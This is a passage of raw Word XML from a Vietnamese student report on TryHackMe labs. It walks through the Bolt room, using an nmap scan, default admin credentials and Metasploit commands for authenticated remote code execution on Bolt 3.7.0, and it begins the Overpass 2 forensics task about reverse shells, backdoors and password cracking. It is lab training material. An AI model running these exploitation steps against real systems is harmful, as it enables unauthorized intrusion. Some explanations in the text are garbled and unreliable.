                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4864100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3EAD8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ết nối thành công màn hình sẽ hiển thị “Initialization Sequence Complete”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7593002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4832D6ED" wp14:editId="616C168A">
            <wp:extent cx="5731200" cy="4940300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38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15"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4940300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2379034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2: Tiến hành quét cổng và lỗ hổng bảo mật bằng lệnh nmap -sSCV [tên miền được cấp]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747F760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0AA9A12D" wp14:editId="2898E42F">
            <wp:extent cx="5731510" cy="684530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="384"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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="684530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E1114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ở đây em dùng lệnh nmap -sSCV 10.10.155.140 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6116D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0C76B8B1" wp14:editId="41981B11">
            <wp:extent cx="5731200" cy="5054600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37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17"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5054600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B59FC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 thấy cổng http được mở là cổng 8000, đây là cổng để ta truy cập vào trang Bolt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BF6A2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ây cũng là câu trả lời cho câu hỏi đầu tiên của thử thách</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3459858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035340EF" wp14:editId="2BEEB790">
            <wp:extent cx="5731510" cy="504825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="504825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69659BC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3: truy cập vào IP Address được cấp bằng cổng 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1649E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Ở đây em truy cập vào 10.10.155.140:8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441D311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au khi truy cập ta sẽ thấy được trang sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF18FB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0004E5A3" wp14:editId="56EA4BEC">
            <wp:extent cx="5731200" cy="4737100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38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19"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4737100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0423D83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756F6EEE" wp14:editId="4EFF9220">
            <wp:extent cx="5731200" cy="4686300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38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20"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4686300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2B9E2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rang này cung cấp cho chúng ta username và password lần lược là “bolt” và “boltadmin123” để đăng nhập vào trang bolt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F6A5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ây cũng chính là câu trả lời cho câu hỏi 2 và 3 của thử thách</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597FE86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3D95C498" wp14:editId="35A3D56F">
            <wp:extent cx="5731510" cy="882650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37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21"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="882650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B04360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4: truy cập vào bolt/login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B996644" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F4E94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693FD179" wp14:editId="5053FA1B">
            <wp:extent cx="5731200" cy="5156200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="376"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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5156200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA58FC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Sau khi đăng nhập thành công chúng ta sẽ được đưa đến trang dashboard, để ý một chút chúng ta sẽ thấy phiên bản CSM được cài đặt trên máy chủ này là 3.7.1, đây cũng là câu trả lời cho câu hỏi thứ 4 của thử thách</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06897002" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="619A9E5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40AEADE8" wp14:editId="08527DCB">
            <wp:extent cx="5731200" cy="5067300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5067300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA6B5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5FB0866C" wp14:editId="1221C77C">
            <wp:extent cx="5731510" cy="450215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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24"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="450215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B4D7B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5: Khai thác lỗ hổng của phiên bản Bolt 3.7.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C4BC5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Chúng ta tiến hành tìm kiếm trên Google với từ khóa Exploit DB bolt, tìm đến bản 3.7.0, ở đây chúng ta sẽ thấy EDB-ID (tệp cơ sở dữ liệu được tạo bởi tính năng Tìm kiếm Windows có trong Microsoft Windows) của Bolt phiên bản 3.7.0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637ADB5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34EEA941" wp14:editId="42DFE7D9">
            <wp:extent cx="5731200" cy="5219700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5219700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3D116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ây cũng là câu trả lời cho câu hỏi thứ 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D1D88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22CE4361" wp14:editId="5DFBA805">
            <wp:extent cx="5731510" cy="443865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="443865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6DEA0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7: Khai thác lỗ hổng của Bolt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB8B13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húng ta tiến hành mở teminal dưới quyền root để tiến hành khai thác lỗ hổng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14726EA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7.1. Gõ msconsole để truy cập vào metaploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050CE6C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7.2. Gõ search bolt để tìm kiếm lỗ hổng bolt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFEF4E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0" distB="0" distL="0" distR="0" wp14:anchorId="1A69A21C" wp14:editId="617CBAED">
            <wp:extent cx="5731510" cy="3549650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3549650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0207199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Ở đây chúng ta có thể thấy phiên bản Bolt 3.7.0 có lỗ hổng authenticated remote code excution có thể khai thác được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656E7CF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091BFD21" wp14:editId="11CA851A">
            <wp:extent cx="5731510" cy="407670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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28"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="407670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABDF7C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7.3: Tiến hành khai thác lỗ hổng bằng lệnh use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D6DC5D" w14:textId="0FDD1F91"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Bước 7.4. Set lhost là địa chỉ ip của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câu lệnh set lhost 10.4.55.221</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D0C48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7.5. Set rhosts là đụa chỉ ip của bolt, câu lệnh set rhosts 10.10.155.140</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4110931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7.6. Đăng nhập vào trang bolt bằng username “bolt” và password “boltadmin123” bằng các lệnh set username bolt và set password boltadmin123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E697B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7.7. Bắt đầu khai thách lỗ hổng bằng lệnh run hoặc exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3058371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8: Tìm kiếm file flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4345D90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húng ta bắt đầu tìm kiếm file flag.txt và mở file này lên để trả lời câu hỏi cuối cùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A498F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2160ED12" wp14:editId="1E738EFA">
            <wp:extent cx="5731510" cy="877570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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29"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="877570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8C51D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5240D294" wp14:editId="1BDB55BA">
            <wp:extent cx="5731200" cy="2908300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2908300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="242D258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487491DE" wp14:editId="3B0CCE8F">
            <wp:extent cx="5731200" cy="3797300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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31"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3797300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7304DC1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0" distB="0" distL="0" distR="0" wp14:anchorId="755D26C7" wp14:editId="11A5908A">
            <wp:extent cx="5731510" cy="3601720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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32"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3601720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7C65D4" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc90050797"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3.6. Overpass 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="6B5B3913" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc90050798"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.6.1. Yêu cầu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="25A97D8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hử thách này bao gồm 3 Task với các câu hỏi của các task như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7242303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sk 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704064F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URL của trang mà họ đã sử dụng để tải lên một trình bao ngược lại là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716EB13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Kẻ tấn công đã sử dụng tải trọng nào để có được quyền truy cập?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E92A36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Những gì kẻ tấn công đã sử dụng mật khẩu để privesc?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A93F82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Làm thế nào mà kẻ tấn công thiết lập được sự bền bỉ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A366B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Sử dụng danh sách từ nhanh, có bao nhiêu mật khẩu hệ thống có thể bẻ khóa được?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8CBC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sk 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029D9152" w14:textId="6AA4FD1A"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Bây giờ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đã tìm thấy mã cho backdoor, đã đến lúc phân tích nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DCA0F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àm băm mặc định cho cửa sau là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3818546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uối mã hóa cứng cho backdoor là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B3CE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àm băm mà kẻ tấn công đã sử dụng là gì? - quay lại PCAP cho việc này!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650C2DF3" w14:textId="3D5E81B6"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Crack băm bằng cách sử dụng Rockou và một công cụ bẻ khóa do </w:t>
      </w:r>
      <w:r w:rsidR="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> lựa chọn. Mật khẩu là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4BC0C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sk 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F9C03" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1580F36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ẻ tấn công đã phá hoại trang web. Họ đã để lại thông điệp gì dưới dạng tiêu đề?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F05DDB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ờ người dùng là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1719D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ờ gốc là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6446D93E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc90050799"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.6.2. Công cụ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="0D0909D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openvpn để thiết lập kết nối với tryhackme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB9A0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wireshark để bắt gói tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DFFFD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john để giải mã mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5366AF0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wordlist fasttrack để giải mã mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255563CE" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc90050800"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.6.3. Các bước thực hiện</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="57E29B8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1: Thiết lập openvpn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B75144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âu lệnh: sudo openvpn LeeCuong(2).ovpn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4598F01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17A6B582" wp14:editId="718DF89E">
            <wp:extent cx="5731200" cy="4864100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37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14"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4864100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17408B7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Kết nối thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223207A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6E87AEAC" wp14:editId="6644DE44">
            <wp:extent cx="5731200" cy="4940300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37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15"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4940300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="745D565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2: Tải task file và mở bằng wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC5D69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7B0FB230" wp14:editId="2433D353">
            <wp:extent cx="5731510" cy="1419225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1419225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC6454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733EE29A" wp14:editId="4E882AC6">
            <wp:extent cx="5731200" cy="5359400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36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34"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5359400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="645CC09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58DDDF72" wp14:editId="52D1F95F">
            <wp:extent cx="5731200" cy="5384800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="370"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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
